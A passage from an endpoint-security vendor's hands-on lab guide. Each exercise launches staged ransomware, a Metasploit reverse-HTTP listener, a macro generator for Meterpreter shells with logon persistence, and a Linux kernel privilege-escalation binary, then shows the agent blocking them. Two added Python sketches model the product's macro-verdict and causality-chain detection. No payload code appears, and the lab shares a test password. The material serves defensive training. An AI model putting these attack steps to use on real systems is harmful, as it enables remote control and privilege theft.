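In the sample the block lands after the third victim, so the remaining two files on the desktop are never touched; the editor and the archiver never accumulate a victim because neither overwrites an existing file and then renames it.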

Task 3 – Attempt Execution of Ransomware on Traps Client


Our previous activities have disabled the WildFire protection module which would normally stop this malware
right away. In this task, we will see the Anti-Ransomware module in action.

Step 1. Review Profiles


In your browser, click the “TMS” tab on the Shortcut Menu.
Select the “Endpoints” > “Endpoints” node, your traps-win1 (e.g. jdoe-win1) endpoint, then click the “Policy”
tab to view the “Assigned Policy”. Alternatively, select “Policy Rules” and view the assigned policies for
“TrapsWin1group”. Note that the Malware Profile is “disable WildFire”.
Select the “Security” > “Profiles” node and click on the “disable WildFire” profile.

Note that “Ransomware Protection” is set for the “Action mode” of “Default (Block)”. Also, “Examine Portable
Executables and DLLs” is “Disabled”. This has been done so WildFire does not block the ransomware and
allows the Ransomware Protection Module to execute.

Step 2. Launch Ransomware


From the “Traps-Win1” desktop, double-click the “OnlineGames” executable. Make sure you are on Traps-
Win1.

Step 3. Observe Anti-Ransomware Protection


The default Traps policy will stop the ransomware before any files are encrypted.

Click “Show Details” to see that the “Anti-Ransomware Protection” module was activated.

Click “OK” to dismiss the Traps dialog box.

Step 4. Verify Prevention in the Event Log


Click the “Events” tab in the Traps console window. This shows that the Anti-Ransomware Protection module
caught the process “OnlineGames.exe” and terminated it.
Click “Check In Now” to pull the event details from your Traps management service.

Step 5. Review Security Event on Traps Management Service


Click the “TMS” tab to access that environment.
Click the “Security” > “Security Events” node. Filter by your endpoint name to show just your events.

Note the most recent event is “Suspicious File Modification”. You may click that event to get further details.
Notice that a WildFire report is already available, because this file is already known to WildFire and would
normally have been stopped immediately as known malware. We had previously disabled WildFire so you could see the
multi-layer capabilities that can detect and prevent ransomware launched using malicious executable files.

End of Activity 8

Activity 9 – Microsoft Office File Protection

In this activity, you will:


• Block known and unknown malicious macros

Task 1 – Review Microsoft Office File Protection


Traps can block malicious macros that are embedded in Microsoft Office documents on Windows endpoints.
By default, Traps automatically blocks malicious macros run from Microsoft Excel and Microsoft Word files and
includes protection for the following file formats:
• Microsoft Office 2003 to Office 2007—doc, xls
• Microsoft Office 2010 and later releases—docm, docx, xlsm, xlsx

Traps evaluates Office macros using the following steps:


1. Traps examines macros in Excel and Word files as they are opened and queries its local cache with
the hash of the macro embedded in each document.
2. If Traps identifies a verdict for a macro (issued either by a previous evaluation via WildFire threat
analysis service or by admin override policy), it allows or blocks the macro according to that verdict.
3. If the macro verdict is unknown locally, Traps queries Traps management service for an official
verdict.
4. If Traps management service has identified the macro as malicious, Traps blocks the macro.
5. If Traps management service does not have a verdict for the macro, it queries WildFire for the verdict
associated with the file containing the macro and optionally submits the file to WildFire for analysis.
6. If the file containing the macro is unknown to WildFire, Traps uses local analysis via machine learning
to issue an immediate verdict and block or allow the macro according to that verdict. WildFire, in turn,
analyzes the unknown macros in the file and renders a verdict.

Task 2 – Prepare Attacker system


In this Task, you will configure the attacker system to set up a reverse HTTP listener to receive a connection
from the successful execution of the malicious Excel macro.

Step 1. Access the Attacker Desktop


Click the “Attacker” tab to access that desktop.

Step 2. Launch the Metasploit Listener


In the terminal window, type the following command at the prompt and press the “enter/return” key:
./macro.sh
This will load Metasploit and configure it to listen for incoming HTTP connections from the victim system.
When Metasploit has completed loading, it should display the following prompt:
“msf exploit(handler) >”

The attacker system is now ready and online, waiting for a connection from the victim system.

Task 3 – Attempt Execution of Known Malicious Macro


In this Task, you will attempt to open an Excel file that contains a malicious macro already known to WildFire.

Step 1. Review Profiles


In your browser, click the “TMS” tab on the Shortcut Menu.
Select the “Endpoints” > “Endpoints” node, your traps-win1 (e.g. jdoe-win1) endpoint, then click the “Policy”
tab to view the “Assigned Policy”. Alternatively, select “Policy Rules” and view the assigned policies for
“TrapsWin1group”. Note that the Malware Profile is “disable WildFire”.
Select the “Security” > “Profiles” node and click on the “disable WildFire” profile.

Note that “Examine Office Files with Macros” is set for the “Action mode” of “Default (Block)”.

Step 2. Observe Traps Office Macro Protection (WildFire Inspection)


Click the “Traps-Win1” tab to display that environment.
Next, find the Excel file named “FinancialReport” on the desktop and double-click the file to open it.
This will launch Excel and attempt to open the file. However, Traps will stop the file from opening and display
a dialog box informing you that it has prevented a malicious action.

Click “Show Details” to see that this previously known macro was stopped by WildFire.

Click “OK” to dismiss the Traps dialog box.


Close out of Excel by clicking the “X” in the upper right-hand corner of the two pop-up windows and then the
application itself.

Step 3. Verify Prevention in the Event Log


Click the “Events” tab in the Traps console window. This shows that WildFire prevented the macro running in
the process “excel.exe” and terminated it.

Step 4. Review Security Event on Traps Management Service


Click the “TMS” tab to access that environment.
Click the “Security“ > “Security Events” node. Filter by your endpoint name to show just your events.

Note the most recent event is “WildFire Malware” for the file “FinancialReport.xls”. You may click that event to
get further details.
Notice that a WildFire report is already available. This file is already known to WildFire.
WildFire uses the hash of the Office file to identify the malicious macro, not the hash of the macro itself. Traps
tracks the hash of the macro as well as the Office files that have been seen with that macro embedded within
them. This is how Traps can render an immediate verdict for any Office file that embeds a known macro,
even if the contents of the Office file are changed or if the macro appears in Office files that are completely
different.
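A model of the six-step macro evaluation from Task 1 and of the macro-hash tracking just described, as an added example that is not Traps code: a document is reduced to a body plus an embedded macro, WildFire is keyed on the whole-file hash, the local cache and management service on the macro hash, and an unknown macro falls through to a local-analysis stand-in and is submitted. The container format, the verdict sources, the local-analysis heuristic and all sample documents are constructed for this illustration.

```python
# Added example (not Traps code): the verdict cascade for Office macros, with
# constructed stand-ins for WildFire, the management service and local analysis.
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class OfficeFile:
    """Toy stand-in for a .xls/.docm: document content plus the embedded VBA macro."""
    name: str
    body: bytes
    macro: bytes

    @property
    def file_hash(self) -> str:          # what WildFire keys its verdict on
        return hashlib.sha256(self.body + self.macro).hexdigest()

    @property
    def macro_hash(self) -> str:         # what Traps tracks locally
        return hashlib.sha256(self.macro).hexdigest()


class MacroVerdictEngine:
    """Steps 1-6: local cache -> management service -> WildFire -> local analysis."""

    def __init__(self, tms_verdicts: Dict[str, str], wildfire_verdicts: Dict[str, str]) -> None:
        self.local_cache: Dict[str, str] = {}   # macro_hash -> "malware" | "benign"
        self.tms = tms_verdicts                  # macro_hash -> verdict (constructed stand-in)
        self.wildfire = wildfire_verdicts        # file_hash -> verdict (constructed stand-in)
        self.submitted: List[str] = []           # file hashes forwarded to WildFire for analysis

    @staticmethod
    def local_analysis(macro: bytes) -> str:
        # Constructed stand-in for the machine-learning verdict: a macro that
        # auto-runs and spawns a process is treated as malicious.
        auto_run = b"Auto_Open" in macro or b"Workbook_Open" in macro
        return "malware" if auto_run and b"Shell" in macro else "benign"

    def evaluate(self, doc: OfficeFile) -> Tuple[str, str]:
        """Return (verdict, source); a "malware" verdict means the macro is blocked."""
        mh, fh = doc.macro_hash, doc.file_hash
        if mh in self.local_cache:                         # steps 1-2: cached verdict for this macro
            return self.local_cache[mh], "local cache"
        if mh in self.tms:                                 # steps 3-4: management service verdict
            verdict, source = self.tms[mh], "management service"
        elif fh in self.wildfire:                          # step 5: WildFire knows the containing file
            verdict, source = self.wildfire[fh], "WildFire"
        else:                                              # step 6: unknown, decide locally and submit
            verdict, source = self.local_analysis(doc.macro), "local analysis"
            self.submitted.append(fh)
        self.local_cache[mh] = verdict                     # the macro hash is remembered, not the file hash
        return verdict, source


def build_scenario():
    """Constructed documents: one macro known to WildFire inside two different files, plus unknown macros."""
    known_bad = b'Sub Auto_Open()\n    Shell "calc.exe"\nEnd Sub\n'
    report = OfficeFile("FinancialReport.xls", b"Q2 revenue table", known_bad)
    reused = OfficeFile("Budget.xls", b"entirely different cells", known_bad)   # same macro, new file hash
    novel = OfficeFile("badfile.xls", b"new workbook",
                       b'Sub Workbook_Open()\n    Shell "notepad.exe"\nEnd Sub\n')
    clean = OfficeFile("totals.xlsm", b"sheet", b'Sub Totals()\n    Range("A1").Value = 1\nEnd Sub\n')
    engine = MacroVerdictEngine(tms_verdicts={}, wildfire_verdicts={report.file_hash: "malware"})
    return engine, report, reused, novel, clean
```

Opening the known file is resolved by WildFire on the file hash; the second file has a different file hash WildFire has never seen, yet it is blocked immediately because the macro hash was cached the first time.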

Task 4 – Generate Unknown Malicious Macro


In this Task, you will generate a malicious macro, currently unknown to WildFire.

Step 1. Access the Traps-Win1 Desktop


Click the “Traps-Win1” tab to display that environment.

Step 2. Generate Malicious Macro


Find the “GenerateMacro” PowerShell script on the Traps Client desktop.

Next, right-click the icon and select Run with PowerShell.
Enter a document name of your choosing.
Enter “1” for Meterpreter Shell with Logon Persistence.
Enter “2” for Meterpreter Reverse HTTP.
A new Excel file will appear on your desktop with the document name you provided.

Step 3. Observe Traps Office Macro Protection (Static Analysis)


As the PowerShell script is writing out the malicious macro, Traps will detect it and stop it.

Note that it was Local Analysis that prevented the rest of the file from even being generated.
Click “OK” to dismiss the Traps dialog box.

Step 4. Verify Prevention in the Event Log


Click the “Events” tab in the Traps console window. This shows that Local Analysis prevented the macro
running in the process “excel.exe” and terminated it.

Step 5. Review Security Event on Traps Management Service


Click the “TMS” tab to access that environment.
Click the “Security” > “Security Events” node. Filter by your endpoint name to show just your events.

Note the most recent event is “Local Analysis Malware” for the file “badfile.xls” (this will be whatever you
named your file). You may click that event to get further details.
The file was sent to WildFire for further analysis. A verdict will be available when it has completed.

Step 6. Check in on the Attacker


Click the “Attacker” tab to display the Attacker Desktop.

Notice that no active connections have been established. Traps has prevented both known and unknown
malicious macros from compromising our endpoints.

End of Activity 9

Activity 10 – Behavioral Threat Protection

In this activity, you will:


• Execute a script-based attack

Task 1 – Review Behavioral Threat Protection


Endpoint attacks often comprise multiple events that occur in the system. By itself, each event appears benign
as attackers leverage legitimate applications and operating system functions to achieve their goal. Strung
together, however, they may represent a malicious event flow. With Behavioral threat protection, Traps
continuously monitors endpoint activity to identify and analyze chains of events—known as causality chains—
rather than a single event. This enables Traps to detect malicious activity in the chain that could otherwise
appear legitimate if inspected individually. A causality chain can include any sequence of network, process,
file, and registry activities on the endpoint.
Palo Alto Networks researchers define the causality chains that are malicious and distribute those chains as
behavioral threat rules. When Traps detects a match to a behavioral threat protection rule, Traps carries out
the configured action (default is Block). In addition, Traps reports the behavior of the entire event chain up to
the process, known as the causality group owner (CGO), that Traps identified as triggering the event
sequence.

Task 2 – Attempt Execution of Script-based Attack


In this Task, you will execute a script-based attack that uses known/benign system utilities in an attempt to
avoid detection.

Step 1. Access the Traps-Win1 Desktop


Click the “Traps-Win1” tab to display that environment.

Step 2. Observe Traps Behavioral Threat Protection


Find the file named “ScriptAttack” on the desktop and double-click it to open the file.

Traps will stop the script-based attack from running due to a “Behavioral threat detected”.

Click “Show details” and scroll down to see that the file attempted to launch the process “wscript.exe.” The
Behavioral Threat Protection component of Traps stopped its execution.

Click “OK” to dismiss the Traps dialog box.

Step 4. Verify Prevention in the Event Log


Click the “Events” tab in the Traps console window. This shows that Behavioral Threat Protection prevented
the file from running in the process “wscript.exe” and terminated it.

Step 5. Review Security Event on Traps Management Service


Click the “TMS” tab to access that environment.
Click the “Security” > “Security Events” node. Filter by your endpoint name to show just your events.

Note the most recent event is “Behavioral Threat”. Click that event to get further details.

Note that the prevention module was Behavioral Threat Prevention and the causality group owner (CGO) is
wscript.exe.
Additional data will come in via Cortex Data Lake (previously known as Logging Service). This may take a little
time, but the event will be populated with additional data. Once this is done, you may scroll down to see this
information. To save time, you may instead open a previously executed Behavioral Threat event to see this
additional data.

Note that four processes are being executed in this script-based attack – wscript.exe, powershell.exe,
mshta.exe and reg.exe. All are known system utilities.
Click the “Analysis” tab (this will also populate after the additional data is pulled in). You will see a timeline of
the behaviors observed with the execution of the script.
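A minimal version of the causality-chain matching described in Task 1, as an added example that is not Traps code: process-creation events are linked parent to child, a behavioral rule is an ordered chain of image names (intermediate processes are allowed), and on a match the earliest process in the chain is reported as the causality group owner. The rule name, the event format and the sample process tree (which mirrors the four utilities listed above) are constructed for this illustration.

```python
# Added example (not Traps code): a causality-chain matcher over constructed
# process-creation events. Rule, pids and command lines are made up.
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str            # lower-case executable name
    cmdline: str = ""


@dataclass
class BehavioralRule:
    name: str
    chain: List[str]      # ancestor-to-descendant image names; gaps in between are allowed
    action: str = "block"


@dataclass
class Match:
    rule: str
    cgo: ProcEvent        # causality group owner: the process that started the sequence
    chain: List[ProcEvent] = field(default_factory=list)


class CausalityMonitor:
    def __init__(self, rules: List[BehavioralRule]) -> None:
        self.rules = rules
        self.procs: Dict[int, ProcEvent] = {}

    def ancestry(self, pid: int) -> List[ProcEvent]:
        """Root-first lineage from the oldest known ancestor down to pid."""
        lineage, seen = [], set()
        while pid in self.procs and pid not in seen:
            seen.add(pid)                      # guards against pid reuse loops
            lineage.append(self.procs[pid])
            pid = self.procs[pid].ppid
        return list(reversed(lineage))

    @staticmethod
    def _match_chain(rule_chain: List[str], lineage: List[ProcEvent]) -> Optional[List[ProcEvent]]:
        """Subsequence match of the rule against the lineage; returns the matched processes."""
        matched, i = [], 0
        for p in lineage:
            if i < len(rule_chain) and p.image == rule_chain[i]:
                matched.append(p)
                i += 1
        return matched if i == len(rule_chain) else None

    def observe(self, ev: ProcEvent) -> Optional[Match]:
        """Record a process start; a rule fires only when its last link appears."""
        self.procs[ev.pid] = ev
        lineage = self.ancestry(ev.pid)
        for rule in self.rules:
            if rule.chain[-1] != ev.image:
                continue
            matched = self._match_chain(rule.chain, lineage)
            if matched and matched[-1].pid == ev.pid:
                return Match(rule.name, cgo=matched[0], chain=matched)
        return None


def run_sample() -> List[Match]:
    """Constructed tree mirroring the ScriptAttack lab: wscript -> powershell -> mshta -> reg."""
    rules = [BehavioralRule("script.lolbin.registry",
                            ["wscript.exe", "powershell.exe", "mshta.exe", "reg.exe"])]
    monitor = CausalityMonitor(rules)
    events = [
        ProcEvent(100, 1, "explorer.exe"),
        ProcEvent(200, 100, "wscript.exe", "ScriptAttack"),
        ProcEvent(300, 200, "powershell.exe"),
        ProcEvent(400, 300, "mshta.exe"),
        ProcEvent(600, 100, "cmd.exe"),             # unrelated interactive shell
        ProcEvent(700, 600, "reg.exe", "query"),    # same utility, benign lineage: no match
        ProcEvent(500, 400, "reg.exe", "add"),      # last link of the malicious chain
    ]
    return [m for m in (monitor.observe(e) for e in events) if m]
```

Each process alone (a script host, a PowerShell, an HTA host, a registry edit) is a normal system utility; only the ordered lineage matches, and the benign reg.exe under cmd.exe never does.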

End of Activity 10

Activity 11 – Traps on Linux

In this activity, you will:


• Execute a kernel privilege escalation on Linux
• Install Traps agent on Linux
• Attempt same kernel privilege escalation against Traps
• Review Traps management service

Task 1 – Execute Kernel Privilege Escalation on Linux


You will run an executable that will use a kernel privilege escalation to get root.
Step 1. Access Linux Client
Click the “Traps-Linux” tab to access the Ubuntu Linux VM. You should already be logged in and at the
console. If you need to log in, use the credentials ubuntu / Password1!

Step 2. Determine Current User


From the CLI, type “whoami” to determine the current user.

As can be seen, you are logged in as the user “ubuntu”.

Step 3. Execute Kernel Privilege Escalation


From the CLI, type “./kpe_exploit1” to run the file that contains the kernel privilege escalation.

Step 4. Determine Current User


From the CLI, type “whoami” to determine the current user.

You are now “root”; the privilege escalation has succeeded.

Step 5. Return to User “ubuntu”


From the CLI, type “exit” to close the root shell and return to your normal user account.

Task 2 – Install Traps on Traps-Linux


In this Task, you will install the Traps Agent on the Traps-Linux environment and verify that Traps is running.

Step 1. Install Traps Agent


From the CLI, type “sudo sh ./traps_installer.sh” and enter the password of “Password1!” if prompted.

Once the install script completes, you will see the shell prompt again.

Step 2. Confirm Traps Agent Running


Type “sudo /opt/traps/bin/cytool runtime query” to confirm the Traps processes are running.

Task 3 – Attempt Execution of Kernel Privilege Escalation on Linux with Traps Agent


You will once again execute the kernel privilege escalation.
Step 1. Determine Current User
From the CLI, type “whoami” to determine the current user.

As can be seen, you are logged in as the user “ubuntu”.

Step 2. Execute Kernel Privilege Escalation


From the CLI, type “./kpe_exploit1” to run the file that contains the kernel privilege escalation.

This time, the escalation attempt was prevented by Traps.

Step 3. Confirm Current User


From the CLI, type “whoami” to determine the current user.

You are still the user “ubuntu”, confirming that the privilege escalation did not succeed.

Step 4. Review Security Event on Traps Management Service


Click the “TMS” tab to access that environment.
Click the “Security” > “Security Events” node. Filter by your endpoint name to show just your events.

Note the most recent event is “Kernel Privilege Escalation”. You may click that event to get further details.

Step 5. Uninstall Traps Agent


Type “sudo /opt/traps/scripts/uninstall.sh” to uninstall the Traps Agent from your VM. When prompted, type “y”
to confirm.

End of Activity 11

Activity 12 - Complete the UTD Evaluation

Thank you for attending the Ultimate Test Drive event. We hope that you found the presentation and lab
activities enjoyable and informative.
In this Activity, we ask that you complete a short evaluation/survey to share your thoughts about this UTD.
We need and appreciate your guidance and advice.

Step 1. Complete a Brief Survey

In your browser, click the “Survey” tab among the list of the available desktop environments for the UTD.

Follow the on-screen instructions to complete the survey and submit your results.

End of Activity 12
